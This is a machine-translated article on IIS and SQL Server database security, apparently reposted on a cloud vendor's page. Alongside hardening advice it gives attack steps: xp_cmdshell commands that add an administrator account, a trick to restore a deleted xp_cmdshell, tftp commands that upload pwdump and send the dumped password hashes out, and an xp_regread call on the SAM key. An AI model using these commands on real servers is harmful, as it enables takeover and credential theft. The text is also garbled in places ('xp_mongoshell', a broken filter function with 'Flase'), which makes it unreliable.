Learn about IIS to SQL Server database security

Source: Internet
Author: User

From codered to nimda, a lot of worms have turned all the vulnerabilities that originally needed to be manually exploited into automatically exploited by programs. Do you still want to perform manual operations on these IIS vulnerabilities? Let's adjust our focus to see common databases on the server.

Generally, websites are based on databases, especially those that are dynamically displayed using databases such as ASP, PHP, and JSP. Many websites may pay more attention to operating system vulnerabilities, but they always ignore the security of databases and these scripts, and do not pay much attention to them.

Starting from the most common scripting issues, these are all old topics. You can refer to the example of simple database intrusion and rogue damage written by Hectic. this article provides a detailed explanation of the SQL script issue. You can also filter the Security Solution of scripts. For more information, see what I wrote earlier. For ASP, you can use the following filter function:


Function Filter_ SQL (strData)
  
Dim strFilter
Dim blnFlag
Dim I
  
StrFilter = "',;, //, --, @, _, exec, declare"
BlnFlag = Flase
  
Dim arrayFilter
ArrayFilter = Split (strFilter ,",")
For I = 0 To UBound (arrayFilter)
If Instr (strData, arrayFilter (I)> 0 Then
BlnFlag = True
Exit
End If
Next
  
If blnFlag Then
Response. Redirect "wrong. asp"
Else
Filter_ SQL = strData
End If
  
End Function


 

For ms SQL Server databases, security issues are not limited to scripts. The system of "Microsoft" is very strong, and the entire WINDOWS-based application is highly correlated. for SQL Server, database management and system management can basically be equivalent. SQL Server's default Administrator Account "sa" password is empty, which creates a security vulnerability for most NT servers. Xiao Rong's "SQLRCMD" can use the obtained Database Administrator Account to execute system commands.

There are many system stored procedures in SQL Server, some of which are used inside the database, and some are called by executing the stored procedure.

System stored procedure: xp_mongoshell

Is to execute the given command string in the way of the operating system command line interpreter. The specific syntax is: xp_mongoshell {'COMMAND _ string'} [, no_output]

By default, xp_mongoshell can only be executed by sysadmin members. However, sysadmin can also grant this execution permission to other users. In earlier versions, users who obtained the xp_cmdshell Execution permission run commands in the user account of SQL Server. You can configure SQL Server by configuring options so that users who do not have sa access permissions on SQL Server can run xp_cmdshell IN THE SQLExecutiveCmdExec Windows NT account. In SQL Server 7.0, this account is called SQLAgentCmdExec. For SQL Server2000, you can run commands directly if you have an account that can execute the stored procedure.

For NT and WIN2000, when the user is not a member of the sysadmin group, xp_mongoshell simulates the Proxy account that uses the SQL Server Agent specified by xp_sqlagent_proxy_account. If the Proxy account cannot be used, xp_mongoshell fails. Therefore, even if an account is the db_owner of the master database, the stored procedure cannot be executed.

If we have a database account that can execute xp_mongoshell, such as a sa account with a blank password. Then we can execute the following command:


Exec xp_cmdshell 'net user refdom 123456/add'
Exec xp_mongoshell 'net localgroup administrators refdom/add'


 

The above two calls Add a user in the system administrator group: refdom

After obtaining the sa Administrator Account of the database, we should be able to fully control the machine. The importance of database security can be seen.

The following stored procedures can be executed on the Public:


Xp_fileexist is used to determine whether a file exists.
Xp_getfiledetails to obtain the file details.
Xp_dirtree, which can expand the directories you need to know and obtain the depth of all directories.
Xp_getnetname to obtain the server name.


 

There are also stored procedures that can operate the Registry. These are not executable to the Public, and must be executed by the system administrator or authorized:


Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumvalues
Xp_regread (executable for Public)
Xp_regremovemultistring
Xp_regwrite


 

SQL Server Security Configuration

In addition to filling all patches with Microsoft, it is also necessary to enhance database security.

First, you need to enhance the password of an account like sa, which is similar to the configuration used by the system account. Generally, do not use an account with the highest permissions such as sa for operating the database, use a general account that meets your requirements.

Then we began to kill the extended stored procedure. The xp_mongoshell was the first, and all the above stored procedures were dropped, which is generally not needed.

Run:


Use master
Sp_dropextendedproc 'xp _ export shell'


 

Remove the guest account to prevent unauthorized access.

Remove unnecessary network protocols.

Strengthen the logging of database login, it is best to record all Login Events. You can use the following simple doscommand to view logs:

Findstr/C: "login" d: Microsoft SQL ServerMSSQLLOG *.*

Use the Administrator account to regularly check all accounts and check whether the password is blank or too simple. For example, the following statement:


Use master
Select name, Password from syslogins where password is null


 

Use the following statement to check the execution right of stored procedures and extended stored procedures for all accounts, and guard against unnecessary execution permission spread:


Use master
Select sysobjects. name From sysobjects,
Sysprotects Where sysprotects. uid = 0
AND xtype IN ('x', 'P') AND sysobjects. id = sysprotects. id


 

It is very important to strengthen database security. Some database servers are isolated from WEB servers. Just like the MAIL server, database logs may be rarely viewed, this will become an oversight of the Administrator. Similar to DNS and MAIL, database servers often become the springboard for various intrusions.

The following are some questions and skills about databases:

1. What should I do if I cannot execute the xp_mongoshell stored procedure after obtaining the SA permission?

A: The xp_mongoshell and other extended stored procedures have been deleted. You can use this stored procedure to restore xp_mongoshell.

Sp_addextendedproc 'xp _ external shell', 'sqlsql70. dll'

2. Use pwdump to obtain the system administrator password.

Upload a pwdump first


Tftp-I GET pwdump3.exe pwdump3.exe
Tftp-I GET lsaext. dll lsaext. dll
Tftp-I GET pwservice.exe
Pwdump3 127.0.0.1 outfile.txt
Tftp PUT outfile.txt


 

And then use the decryption tool l0pht to crack these passwords.

3. Read the system administrator password from the database.

The encrypted password cannot be read by the NT "administrator" account. The SQL Server can read the encrypted password from the "LocalSystem" account, which is a higher level than the administrator account. You can use the following stored procedure. However, the Read Password is encrypted and then decrypted.

Xp_regread 'HKEY _ LOCAL_MACHINE ', 'securitysamdomainsaccount', 'F'

Of course, there are still many database security and defects, and more research is needed. I am still in the initial stage of learning the database. I am sorry for the error. Please kindly advise me. If you have

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.